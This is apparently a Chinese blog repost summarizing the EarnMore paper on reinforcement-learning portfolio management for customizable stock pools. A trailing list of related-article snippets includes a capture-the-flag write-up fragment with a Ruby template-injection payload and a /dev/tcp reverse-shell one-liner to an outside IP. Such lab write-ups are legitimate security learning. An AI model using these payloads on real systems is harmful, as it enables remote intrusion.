WWW ‘24 | EarnMore: 如何利用强化学习来处理可定制股票池中的投资组合管理问题

WWW '24 | EarnMore: 如何利用强化学习来处理可定制股票池中的投资组合管理问题

原创 QuantML QuantML 2024-04-16 09:04 上海

Content

本文主要探讨了如何利用强化学习(Reinforcement Learning, RL)来处理可定制股票池(Customizable Stock Pools, CSPs)中的投资组合管理(Portfolio Management, PM)问题。

1. 引言与背景

投资组合管理是金融交易中的基本任务,目的是通过不同股票之间的资本分配来追求长期利润

现有的RL方法主要关注固定股票池,这与投资者的实际需求不符,因为不同投资者的目标股票池可能因市场状态和个人偏好而显著不同。

为了解决这一问题,论文提出了一个名为EarnMore的RL框架,它通过在全球股票池(Global Stock Pool, GSP)中一次性训练,来处理CSPs中的PM问题。

2. 相关工作

论文回顾了传统的投资组合管理方法,如均值回归和动量策略,以及基于预测的方法,如机器学习和深度学习方法。

论文还讨论了Masked Autoencoders(MAEs)在时间序列预测中的应用,特别是在金融市场中的低信噪比数据。

3. 方法论

EarnMore模型结构是为了解决在可定制股票池(CSPs)中进行投资组合管理(PM)的问题。模型结构包含三个主要组成部分:Maskable Stock Representation(MSR),Reinforcement Learning Optimization(RL Optimization),以及Re-weighting Method。

图片

    1. Maskable Stock Representation (MSR)

    MSR是EarnMore模型的核心,它通过以下步骤来处理和表示股票信息:

    Stock-level Representation:该部分利用股票的特征(如价格和技术指标)和时间特征来生成股票级别的表示。使用一维卷积(1D Convolution)来产生密集的嵌入,并使用嵌入层来处理稀疏的时间特征。最终的股票级别表示是通过密集和稀疏嵌入的总和形成的。

    Pool-level Representation:股票级别的表示仅描述了每个单独股票内部的垂直时间序列信息,而没有捕捉到股票之间的水平关系。为了解决这个问题,引入了池级别的表示,通过掩码和重建过程来强化GSP中股票之间的联系。这个过程使用股票级别的嵌入作为局部嵌入,替换了MAEs中用于历史数据的补丁嵌入。    

    Masking and Reconstruction Process:在训练过程中,使用自适应掩码策略来模拟不同股票数量和组成的各种CSPs,提高了池级别嵌入的表示能力,并统一了高掩码和低掩码比例股票池的训练框架。通过编码器和解码器的过程,使用掩码操作来选择性地掩盖一部分股票级别的嵌入,然后使用掩码填充操作来恢复这些嵌入,并使用解码器来重建被掩盖股票的价格。

    2. Reinforcement Learning Optimization (RL Optimization)

    EarnMore模型的RL优化过程基于Soft Actor-Critic (SAC)算法,包含两个主要组件:Actor和Critic。

    Actor:利用由掩码标记填充的潜在嵌入来生成动作,这些动作指示现金和个别股票的分配比例。Actor在决策过程中会避免分配不利股票。

    Critic:使用由Actor生成的动作和潜在嵌入来评估投资组合的表现,并提供一个评分机制来指导学习过程并优化投资策略。

    Q-Value Network Optimization:使用MSR定义的掩码股票表示作为状态输入,通过最小化灵活的Bellman残差来学习Q值函数。

    Policy Network Optimization:使用重参数化技术来优化策略网络,并通过最小化KL散度来实现。

    Parameter Alpha Optimization:使用自动熵调整方法来调整熵参数,通过最小化损失函数来实现。

    3. Re-weighting Method

    在连续的决策空间中,为了解决投资组合管理中的准确决策问题,引入了重新加权方法。该方法通过在softmax函数中引入一个额外的超参数来实现投资组合的稀疏化,从而将微小的投资比例重新加权到零。

    Softmax Re-weighting:使用一个温度参数来调整softmax函数,较低的温度值会导致更稀疏的分配。随着温度参数接近零,所有投资都倾向于分配给预期回报最高的资产。

    这些组成部分共同工作,使得EarnMore模型能够在全球股票池中一次性训练,并能够适应不同投资者的个性化需求和市场条件的变化。通过这种方式,EarnMore能够在不同的CSPs中实现优化的投资组合管理。

4. 实验

在美国股票市场的8个子集股票池上进行了广泛的实验。

EarnMore在6个流行的财务指标上显著优于14个最先进的基线方法,利润提高了40%以上。

图片

论文还展示了EarnMore在不同市场条件下的表现,以及在投资者个人决策过程中的适应性和鲁棒性。

图片

图片

图片

5. 结论与未来方向

EarnMore通过增强的掩码和重建过程提高了股票表示的性能,并引入了重新加权方法来改善投资组合。

未来研究将集中在通过风险惩罚优化来增强风险控制,并创建一个灵活、开放的可定制股票池,允许轻松添加或移除股票。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/558872.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Golang | Leetcode Golang题解之第40题组合总和II

题目: 题解: func combinationSum2(candidates []int, target int) (ans [][]int) {sort.Ints(candidates)var freq [][2]intfor _, num : range candidates {if freq nil || num ! freq[len(freq)-1][0] {freq append(freq, [2]int{num, 1})} else {…

LabVIEW卡尔曼滤波技术

LabVIEW卡尔曼滤波技术 在现代航空导航中,高精度和快速响应的方位解算对于航空安全至关重要。通过LabVIEW平台实现一种卡尔曼滤波方位解算修正技术,以改善传统导航设备在方位解算中的噪声干扰问题,从而提高其解算精度和效率。通过LabVIEW的强…

Ubuntu上阅读Android源码工具

由于Android源码过于庞杂,里面有多种语言源文件,想只用一IDE统一索引是不现实的。我个人便使用AS阅读JAVA代码,VS看C/C代码,在Ubuntu上不能使用SI,所以直接放弃。在framework开发这个层面上来讲,因为大部分…

Ansible组件说明

1.Ansible Inventory 工作当中有不同的业务主机,我们需要在把这些机器信息存放在inventory里面,ansible默认的inventory的文件是/etc/ansible/hosts,也可以通过ANSIBLE_HOSTS环境变量来指定或者运行ansible和ansible-playbook的时候用-i参数临…

数据可视化(五):Pandas高级统计——函数映射、数据结构、分组聚合等问题解决,能否成为你的工作备用锦囊?

Tips:"分享是快乐的源泉💧,在我的博客里,不仅有知识的海洋🌊,还有满满的正能量加持💪,快来和我一起分享这份快乐吧😊! 喜欢我的博客的话,记得…

js中let和var的区别

在JavaScript中,var、let和const都用于声明变量,但它们之间存在一些重要的区别。特别是let和var之间的区别,我们可以概括为以下几点: 作用域(Scope):var有函数作用域或全局作用域,而…

B-树 B+树与数据库原理

B树 引入 概念和性质 插入分析 总结 B树 B*树(了解) 数据库原理 数据库与B树的关系

【MySQL 数据宝典】【磁盘结构】- 003 双写缓冲区

一、双写缓冲区 ( Doublewrite Buffer Files) 1.1 背景介绍 写失效 (部分页失效) InnoDB的页和操作系统的页大小不一致,InnoDB页大小一般为16K,操作系统页大小为4K,InnoDB的页写入到磁盘时,一个页需要分4次写。如果存储引擎正在…

算法训练营day15

一、层序遍历 参考链接7.2 二叉树遍历 - Hello 算法 (hello-algo.com) 层序遍历本质上属于广度优先遍历,也称广度优先搜索, BFS通常借助队列的先入先出的特性实现 参考链接102. 二叉树的层序遍历 - 力扣(LeetCode) 像这种较为…

社交媒体数据恢复:与你科技

在数字时代,数据是我们生活中的重要组成部分。无论是个人照片、文档,还是企业的重要资料,数据在我们的生活中扮演着举足轻重的角色。然而,数据丢失的问题时常发生,给我们带来了很多麻烦。幸运的是,当下众多…

搭建HBase2.x完全分布式集群(CentOS 9 + Hadoop3.x)

Apache HBase™是一个分布式、可扩展、大数据存储的Hadoop数据库。 当我们需要对大数据进行随机、实时的读/写访问时,可以使用HBase。这个项目的目标是在通用硬件集群上托管非常大的表——数十亿行X数百万列。Apache HBase是一个开源、分布式、版本化的非关系数据库…

[Meachines][Easy]Perfection

Main $ nmap -sV -sC 10.10.11.253 --min-rate 1000 使用Ruby开发的,尝试Ruby的SSTI注入 x%0a<%25%3Dsystem("ping-c110.10.16.23");%25> $ echo "/bim/bash -i >& /dev/tcp/10.10.16.23/10032 0>&1"|base64 category1x%0a<%25%3…

sqli-labs靶场学习(一)

一.知识点 1.数据库 数据库是一个用于存储和管理数据的仓库。数据按照特定的格式存储&#xff0c;可以对数据库中的数据进行增加、修改、删除和查询操作。数据库的本质是一个文件系统&#xff0c;按照一定的逻辑结构组织数据&#xff0c;以方便高效地访问和维护。 2.数据库管…

RCE漏洞及其绕过——[SWPUCTF 2021 新生赛]easyrce、caidao、babyrce

目录 什么是Shell 1、Shell简介 2、印刷约定 一、什么是RCE 漏洞产生条件&#xff1a; 漏洞检测&#xff1a; 1.远程命令执行 system()函数&#xff1a; passthru()函数&#xff1a; exec()函数&#xff1a; 无回显 shell_exec()函数&#xff1a; 2.远程代码执行 e…

我的创作纪念日(256)

一、缘起——Why I choose CSDN 在大二升到大三的暑假期间&#xff0c;为了督促自己学习智能机器人这一领域的知识&#xff0c;啃下这块硬骨头&#xff0c;我决定一边学习&#xff0c;一边在CSDN这个平台上分享一些学习心得。当时我跟着韩顺平老师学习Linux系统&#xff0c;跟…

IP地址定位:揭秘精准定位的技术与应用

在数字化时代&#xff0c;IP地址已成为连接互联网世界的关键标识之一。但是&#xff0c;很多人对于IP地址的精准定位能力存在疑虑。本文将深入探讨IP地址定位的技术原理以及其在实际应用中的精确度。 IP地址查询&#xff1a;IP数据云 - 免费IP地址查询 - 全球IP地址定位平台 …

torchvision指定版本whl安装(Ubuntu20环境)

pytorch教程需要torchvision下载数据集&#xff0c;使用pip安装指定版本&#xff0c;首先使用conda list torch查看自己安装torch版本&#xff0c;我的pytorch版本1.9.0对应cuda版本11.1 在以下网址查找对应torchvision版本&#xff0c;https://pytorch.org/get-started/prev…

vue-cli2 与vue-cli3,vue2与vue3 初始化项目,本地vue项目,详细解析区别(2024-04-19)

目录 1、区别&#xff08;vue-cli2 与 vue-cli3 &#xff09; 2、例子1&#xff08;vue2项目&#xff09; 2.1 版本与命令行 2.2 项目本地截图 2.3 项目文件解析 &#xff08;1&#xff09;package.json 文件 &#xff08;2&#xff09;webpack.dev.conf.js文件 &#…

【备战算法岗】—— 控制模块复习(持续更新!!!)

1 控制理论基础 1.1 控制模块概述 输入&#xff1a;轨迹线Reference、地图信息、定位信息、车辆反馈信息 输出&#xff1a;刹车、油门、转向 CANBUS&#xff1a;车辆底盘交互协议 底盘、速度、四轮转速、健康状况、底盘报错、自动驾驶状态 运动学模型&#xff1a;刚体运动&a…

linux的线程概念

目录 1.原理 2.线程的周边概念 3.创建线程的接口 1.pthread_create 2.pthread_join 3.pthread_detach 4.终止线程 5.C11封装的多线程库 4.线程库的大概结构 5.__thread&#xff08;只能修饰内置类型&#xff09; 6.线程的互斥 1.了解原理 2.加锁 1.接口 2.代码示…
最新文章